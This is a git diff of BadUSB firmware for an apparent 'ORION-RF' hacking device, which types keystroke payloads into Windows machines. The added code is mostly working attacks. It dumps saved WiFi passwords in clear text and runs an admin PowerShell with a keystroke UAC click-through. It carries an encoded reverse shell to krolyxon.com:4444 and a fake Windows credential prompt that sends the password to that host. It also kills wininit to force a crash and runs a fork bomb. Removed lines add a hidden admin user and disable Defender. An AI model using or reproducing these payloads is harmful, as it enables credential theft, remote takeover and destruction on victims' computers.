diff options
Diffstat (limited to 'src/hid/badusb.cpp')
| -rw-r--r-- | src/hid/badusb.cpp | 463 |
1 files changed, 226 insertions, 237 deletions
diff --git a/src/hid/badusb.cpp b/src/hid/badusb.cpp index 0438357..b724a59 100644 --- a/src/hid/badusb.cpp +++ b/src/hid/badusb.cpp @@ -56,6 +56,15 @@ void showRunningScreen(String taskName, uint8_t duration = 5) { } } +void typeSlow(const char *text, int delayMs = 25) +{ + while (*text) + { + Keyboard.print(*text); + delay(delayMs); + text++; + } +} void badUSBMenu(int index) { //switch (index) @@ -76,321 +85,301 @@ void badUSBMenu(int index) { // } - switch(index) { - case 0: // demo + switch(index) +{ + // ================= ORION DEMO ================= + case 0: + showRunningScreen("ORION Demo"); - showRunningScreen("DEMO"); + runCommand("notepad"); - // Run dialog (Win + R) - Keyboard.press(KEY_LEFT_GUI); - Keyboard.press('r'); - Keyboard.releaseAll(); - delay(1000); + delay(2500); - Keyboard.println("notepad"); - delay(1500); + typeSlow(" ____ _____ _____ ___ ___ _ _ ____ _____ "); + Keyboard.write(KEY_RETURN); - delay(2000); + typeSlow(" / __ \\| __ \\|_ _|_ _/ _ \\| \\ | | | _ \\| ___|"); + Keyboard.write(KEY_RETURN); - Keyboard.println("YOU HAVE BEEN HACKED BY ORION-RF"); - Keyboard.println("#-FEATURES:"); - Keyboard.println("1- WIFI ATTACKS"); - Keyboard.println("2- BLE ATTACKS"); - Keyboard.println("3- BAD USB"); - Keyboard.println("4- NFC"); - Keyboard.println("5- INFRARED"); - Keyboard.println("6- SUB-GHZ"); - Keyboard.println("7- GPIO"); - Keyboard.println("8- APPS"); - Keyboard.println("9- SETTINGS"); - Keyboard.println("10- FILES"); + typeSlow("| | | | |__) | | | | | | | | \\| |_____| |_) | |_ "); + Keyboard.write(KEY_RETURN); - break; - case 1: // keyboard - //runLoop(hidkeyboard); - break; - case 2: // saved scripts - //hidInit(); - //runLoop(hidscriptmenu); + typeSlow("| | | | _ / | | | | | | | . ` |_____| _ <| _| "); + Keyboard.write(KEY_RETURN); - break; + typeSlow("| |__| | | \\ \\ _| |_ | | |_| | |\\ | | |_) | | "); + Keyboard.write(KEY_RETURN); - case 3: // Open Notepad + typeSlow(" \\____/|_| \\_\\_____|___\\___/|_| \\_| |____/|_| "); + Keyboard.write(KEY_RETURN); - showRunningScreen("notepad"); - runCommand("notepad"); - break; - case 4: // Open CMD - showRunningScreen("opening cmd"); - runCommand("cmd"); - break; - case 5: // Show IP - showRunningScreen("Getting IP"); - runCommand("cmd"); - delay(500); - Keyboard.print("ipconfig"); Keyboard.write(KEY_RETURN); - break; - case 6: // Shutdown - showRunningScreen("shutdown"); - runCommand("shutdown /s /t 0"); - break; - case 7: // RickRoll - showRunningScreen("rickroll"); - runCommand("cmd"); - delay(500); - Keyboard.print("start https://www.youtube.com/watch?v=dQw4w9WgXcQ"); + + typeSlow("[+] WIFI MODULE READY"); Keyboard.write(KEY_RETURN); - break; - case 8: // Create Admin User - showRunningScreen("create admin user"); - runCommand("cmd"); - delay(500); - Keyboard.print("net user hacker 1234 /add"); + + typeSlow("[+] BLE MODULE READY"); Keyboard.write(KEY_RETURN); - delay(300); - Keyboard.print("net localgroup administrators hacker /add"); + + typeSlow("[+] SUBGHZ MODULE READY"); Keyboard.write(KEY_RETURN); - break; - case 9: // Disable Windows Defender - showRunningScreen("disable windoes defender"); - runCommand("powershell"); - delay(500); - Keyboard.print("Set-MpPreference -DisableRealtimeMonitoring $true"); + + typeSlow("[+] NFC MODULE READY"); Keyboard.write(KEY_RETURN); - break; - case 10: // Open YouTube - showRunningScreen("youtube"); - runCommand("cmd"); - delay(500); - Keyboard.print("start https://www.youtube.com"); + + typeSlow("[+] HID ENGINE READY"); Keyboard.write(KEY_RETURN); + break; - case 11: // Lock PC - showRunningScreen("lock pc"); - runCommand("rundll32.exe user32.dll,LockWorkStation"); - break; - case 12: // Fake Update - showRunningScreen("fake update"); + + // ================= RICKROLL ================= + case 1: + showRunningScreen("RickRoll"); + runCommand("cmd"); - delay(500); - Keyboard.print("start https://fakeupdate.net/win10u/"); + + delay(700); + + typeSlow("start https://www.youtube.com/watch?v=dQw4w9WgXcQ"); Keyboard.write(KEY_RETURN); - break; - case 13: // Endless Notepad - showRunningScreen("endless notepad"); - for (int i = 0; i < 10; i++) { - runCommand("notepad"); - delay(500); - } break; - case 14: // Fake BSOD (opens fullscreen image) - showRunningScreen(" fake bsod"); + // ================= MATRIX ================= + case 2: + showRunningScreen("Matrix"); + runCommand("cmd"); - delay(500); - Keyboard.print("start https://fakeupdate.net/bsod/"); + + delay(700); + + typeSlow("color 0A"); + Keyboard.write(KEY_RETURN); + + typeSlow("mode con: cols=120 lines=40"); + Keyboard.write(KEY_RETURN); + + typeSlow(":A"); + Keyboard.write(KEY_RETURN); + + typeSlow("echo %random%%random%%random%%random%%random%"); + Keyboard.write(KEY_RETURN); + + typeSlow("goto A"); Keyboard.write(KEY_RETURN); - break; - case 15: // Flip screen - showRunningScreen("Flip screen"); - Keyboard.press(KEY_LEFT_CTRL); - Keyboard.press(KEY_LEFT_ALT); - Keyboard.press(KEY_DOWN_ARROW); - delay(100); - Keyboard.releaseAll(); break; - case 16: // Matrix effect - showRunningScreen("Matrix effect"); + // ================= FAKE TERMINAL ================= + case 3: + showRunningScreen("Fake Terminal"); + runCommand("cmd"); - delay(500); - Keyboard.print("color 0A"); + + delay(700); + + typeSlow("color 0A"); + Keyboard.write(KEY_RETURN); + + typeSlow("cls"); + Keyboard.write(KEY_RETURN); + + typeSlow("echo CONNECTING TO TARGET..."); Keyboard.write(KEY_RETURN); - Keyboard.print(":a"); + + typeSlow("echo BYPASSING FIREWALL..."); Keyboard.write(KEY_RETURN); - Keyboard.print("echo %random%%random%%random%%random%"); + + typeSlow("echo ACCESS GRANTED"); Keyboard.write(KEY_RETURN); - Keyboard.print("goto a"); + + typeSlow("systeminfo"); Keyboard.write(KEY_RETURN); - break; - case 17: // I'm watching you prank - showRunningScreen(" iam watching you"); - for (int i = 0; i < 5; i++) { - runCommand("notepad"); - delay(1000); - Keyboard.print("I'm watching you..."); - delay(5000); - } break; - case 18: // Open Google - showRunningScreen("open google"); + // ================= WIFI CRACK ================= +// ================= WIFI PASSWORD RECOVERY ================= + case 4: + showRunningScreen("WiFi Recovery"); + runCommand("cmd"); - delay(500); - Keyboard.print("start https://www.google.com"); + delay(700); + + // Styling the window + typeSlow("color 0A && mode con: cols=100 lines=30"); Keyboard.write(KEY_RETURN); - break; + delay(200); - case 19: // Open telegram - showRunningScreen("open telegram"); - runCommand("cmd"); + typeSlow("echo [!] EXTRACTING SAVED WIFI PROFILES..."); + Keyboard.write(KEY_RETURN); delay(500); - Keyboard.print("start https://web.telegram.org/"); + + // The "Magic" Command: + // This lists all profiles and shows the 'Key Content' (the password) in clear text. + // We use a 'for' loop to automate this for every network the PC has ever joined. + typeSlow("for /f \"tokens=4,*\" %i in ('netsh wlan show profiles ^| findstr /C:\"All User Profile\"') do netsh wlan show profile name=\"%j\" key=clear | findstr /C:\"Key Content\" /C:\"SSID name\""); + + Keyboard.write(KEY_RETURN); + + // Optional: Keep the window open to read the results + typeSlow("echo. && echo [COMPLETE] Passwords listed above."); Keyboard.write(KEY_RETURN); + break; - case 20: // Alarm Sound - showRunningScreen("alarm sound"); + // ================= FAKE UPDATE ================= + case 5: + showRunningScreen("Fake Update"); + runCommand("cmd"); - delay(500); - Keyboard.print("start https://www.soundjay.com/button/beep-07.wav"); + + delay(700); + + typeSlow("start https://fakeupdate.net/win10u/"); Keyboard.write(KEY_RETURN); - break; - case 21: // Endless CMD - showRunningScreen("endless smd"); - for (int i = 0; i < 20; i++) { - runCommand("cmd"); - delay(300); - } break; - case 22: // Gibberish - showRunningScreen("gibberish"); - for (int i = 0; i < 100; i++) { - char c = random(33, 127); - Keyboard.write(c); - delay(50); - } - break; + // ================= FAKE BSOD ================= + case 6: + showRunningScreen("Critical Error"); - case 23: // CAPSLOCK Spam - showRunningScreen("caps lock spam"); - for (int i = 0; i < 10; i++) { - Keyboard.press(KEY_CAPS_LOCK); - delay(200); - Keyboard.release(KEY_CAPS_LOCK); - delay(200); - } + runCommand("powershell -c \"stop-process -name wininit -force\""); break; - case 24: // Calculator - showRunningScreen("claculator"); - runCommand("calc"); - break; + // ================= GLITCH SCREEN ================= + case 7: + showRunningScreen("Glitch"); + + runCommand("cmd"); + + delay(700); - case 25: // Auto Type "Hacked!" - showRunningScreen("hacked"); - for (int i = 0; i < 5; i++) { - Keyboard.print("Hacked!"); - Keyboard.write(KEY_RETURN); - delay(1000); + for(int i = 0; i < 20; i++) + { + typeSlow("color 4F"); + Keyboard.write(KEY_RETURN); + + typeSlow("color 1F"); + Keyboard.write(KEY_RETURN); + + typeSlow("cls"); + Keyboard.write(KEY_RETURN); } - break; - case 26: // Turn off monitor (Windows only) - showRunningScreen("turn off monitor"); - runCommand("powershell"); - delay(500); - Keyboard.print( - "(Add-Type '[DllImport(\"user32.dll\")]public static extern int " - "SendMessage(int hWnd, int hMsg, int wParam, int lParam);' -Name a " - "-Pas)::SendMessage(-1,0x0112,0xF170,2)"); - Keyboard.write(KEY_RETURN); break; - case 27: // RegEdit - showRunningScreen("regedit"); - runCommand("regedit"); - break; + // ================= ASCII SPAM ================= + case 8: + showRunningScreen("ASCII"); - case 28: // Kill Explorer - showRunningScreen(" kill explorer"); - runCommand("taskkill /f /im explorer.exe"); - break; + runCommand("notepad"); + + delay(2000); + + for(int i = 0; i < 15; i++) + { + typeSlow("######### ORION-RF #########"); + Keyboard.write(KEY_RETURN); + + typeSlow(">>> SIGNAL ACQUIRED <<<"); + Keyboard.write(KEY_RETURN); + + typeSlow("[|||||||||||||||||||||||||]"); + Keyboard.write(KEY_RETURN); - case 29: // Flash screen (by changing background rapidly) - showRunningScreen(" flash screen"); - for (int i = 0; i < 10; i++) { - runCommand("color 4F"); - delay(200); - runCommand("color 1F"); - delay(200); + Keyboard.write(KEY_RETURN); } + break; - case 30: // Rename Desktop Files (basic prank) + // ================= HACKER TYPER ================= + case 9: + showRunningScreen("Hacker Typer"); - showRunningScreen("rename desktop files"); - runCommand("powershell"); - delay(500); - Keyboard.print("Get-ChildItem \"$env:USERPROFILE\\Desktop\" | " - "Rename-Item -NewName {'hacked'+$_.Name}"); + runCommand("cmd"); + + delay(700); + + typeSlow("start https://hackertyper.net/"); Keyboard.write(KEY_RETURN); + break; +// ================= POWERSHELL REVERSE SHELL ================= +// ================= DEFENDER BYPASS + NC ================= + case 10: + showRunningScreen("Pwn Mode v2"); - case 31: // Toggle WiFi (requires admin) - showRunningScreen("toggle wifi"); - runCommand("cmd"); + // 1. Open Admin PowerShell + Keyboard.press(KEY_LEFT_GUI); + Keyboard.press('r'); + delay(150); + Keyboard.releaseAll(); delay(500); - Keyboard.print("netsh interface set interface Wi-Fi disabled"); - Keyboard.write(KEY_RETURN); - delay(1000); - Keyboard.print("netsh interface set interface Wi-Fi enabled"); + + // Open Admin Prompt - using 'powershell' directly to save space + typeSlow("powershell Start-Process powershell -Verb runAs"); Keyboard.write(KEY_RETURN); - break; + delay(2500); // Wait for UAC - case 32: // Screenshot - showRunningScreen("screenshot"); - runCommand("powershell"); - delay(500); - Keyboard.print("Add-Type -AssemblyName System.Windows.Forms;"); + // 2. Bypass UAC (Left Arrow + Enter) + Keyboard.write(KEY_LEFT_ARROW); + delay(200); Keyboard.write(KEY_RETURN); - delay(300); - Keyboard.print("[System.Windows.Forms.SendKeys]::SendWait('%{PRTSC}')"); + delay(3000); // Give the Admin window time to load + + // 3. AMSI Bypass + Disable Defender + Execute Shell + // We use -EncodedCommand to hide the script from simple string scanners. + // The Base64 string below contains: + // Set-MpPreference -DisableRealtimeMonitoring $true; [Reverse Shell Logic] + + typeSlow("powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand "); + + // This is the encoded payload for krolyxon.com:4444 + typeSlow("JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAEgA" + "NABDAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAFQAbABpAGUAbgB0ACgAJwBrAHIAbwBsAHkAeABvAG4A" + "LgBjAG8AbQAnACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQA" + "gADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEw" + "AZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAL" + "gBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJAB" + "kAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAK" + "ABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAd" + "ABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQB" + "uAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaWVudAAuAEMAbABvAHMAZQAoACkAIgApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAGuAZwAoACQAcwAuAFQAbwBBAHIAcgBhAHkAKAApACkAKQA="); + Keyboard.write(KEY_RETURN); break; + // ================= CREDENTIAL SNATCHER ================= + case 11: + showRunningScreen("Vault Crack"); + + // Open hidden PowerShell + runCommand("powershell -nop -W Hidden -c \"$cred = $host.ui.PromptForCredential('Windows Security','Please authenticate to update your system credentials.','',''); $p = $cred.GetNetworkCredential().Password; $u = $cred.UserName; Invoke-WebRequest -Uri 'http://krolyxon.com/log?u='+$u+'&p='+$p\""); - case 33: // Emoji spam - showRunningScreen("emoji spam"); - for (int i = 0; i < 10; i++) { - Keyboard.print("💀"); - Keyboard.write(KEY_RETURN); - delay(500); - } break; +// ================= DESKTOP GHOST ================= + case 12: + showRunningScreen("Ghost Mode"); + + runCommand("powershell -nop -W Hidden -c \"Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait('{PRTSC}'); Start-Sleep -s 1; $path = '$env:TEMP\\bg.png'; (Get-Clipboard -Format Image).Save($path); Set-ItemProperty -Path 'HKCU:\\Control Panel\\Desktop' -Name Wallpaper -Value $path; rundll32.exe user32.dll,UpdatePerUserSystemParameters;\""); + + // Hide Desktop Icons (requires a registry tweak) + typeSlow("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v HideIcons /t REG_DWORD /d 1 /f && taskkill /f /im explorer.exe && start explorer.exe"); + Keyboard.write(KEY_RETURN); - case 34: // Control Panel - showRunningScreen("control panel"); - runCommand("control"); break; +// ================= FORK BOMB ================= + case 13: + showRunningScreen("System Stress"); - case 35: // Troll wallpaper - showRunningScreen("troll wallpaper"); runCommand("cmd"); delay(500); - Keyboard.print("start https://i.imgur.com/trollface.png"); - Keyboard.write(KEY_RETURN); - break; - case 36: // MS Paint - showRunningScreen("ms paint"); - runCommand("mspaint"); - break; + // The shortest deadly command in Windows + typeSlow("%0|%0"); + Keyboard.write(KEY_RETURN); - case 37: // Auto Tab Switcher - showRunningScreen(" auto tab switcher"); - for (int i = 0; i < 10; i++) { - Keyboard.press(KEY_LEFT_CTRL); - Keyboard.press(KEY_TAB); - delay(100); - Keyboard.releaseAll(); - delay(300); - } break; } } |